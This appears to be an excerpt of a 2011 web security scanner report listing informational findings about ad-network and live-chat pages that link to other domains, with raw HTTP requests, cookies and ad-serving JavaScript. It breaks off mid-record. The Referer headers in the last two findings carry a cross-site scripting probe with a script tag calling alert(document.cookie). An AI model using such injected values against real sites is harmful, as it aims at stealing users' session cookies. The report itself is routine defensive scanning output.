document.write ('<A HREF="http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=1711169344?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=1711169344?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.141. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/

The response contains the following links to other domains:

http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/2075144341/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=2075144341?
http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=2075144341?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/2075144341/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2075144341?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/2075144341/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2075144341?

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:37:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3318
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/2075144341/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2075144341?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/2075144341/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2075144341?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/2075144341/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=2075144341?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=2075144341?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.142. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/

The response contains the following links to other domains:

http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=874556783?
http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=874556783?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3321
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=874556783?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=874556783?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.143. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/

The response contains the following links to other domains:

http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/374200294/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=374200294?
http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=374200294?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/374200294/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=374200294?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/374200294/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=374200294?

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:37:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3321
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/374200294/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=374200294?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/374200294/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=374200294?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/374200294/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=374200294?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=374200294?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.144. https://base.liveperson.net/hc/5296924/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://base.liveperson.net
Path:	/hc/5296924/

Issue detail

The page was loaded from a URL containing a query string:

https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386

The response contains the following links to other domains:

https://liveperson-partners.s3.amazonaws.com/shared/js/mbox.js
https://roi.business.com/crm/js/conversion.js
https://ssl.google-analytics.com/ga.js

Request

GET /hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386 HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; HumanClickCHATKEY=3761611791040242971; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:06:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Content-Type: text/html
Last-Modified: Fri, 28 Jan 2011 14:06:44 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 43173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">
<head>

...[SNIP]...
<![endif]-->

<script type="text/javascript" src="//liveperson-partners.s3.amazonaws.com/shared/js/mbox.js"></script>
...[SNIP]...
</table>

<script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

<script language="JavaScript" src="https://roi.business.com/crm/js/conversion.js"></script>
...[SNIP]...

17.145. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch

The response contains the following links to other domains:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle
http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle?x
http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle?x

Request

GET /includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7231934c67
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:34 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1861
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Middle?x" BORDER="0"></a>
...[SNIP]...

17.146. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bh.heraldinteractive.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch

The response contains the following links to other domains:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom
http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom?x
http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom?x

Request

GET /includes/processAds.bg?position=Bottom&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7231934c67
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:34 GMT
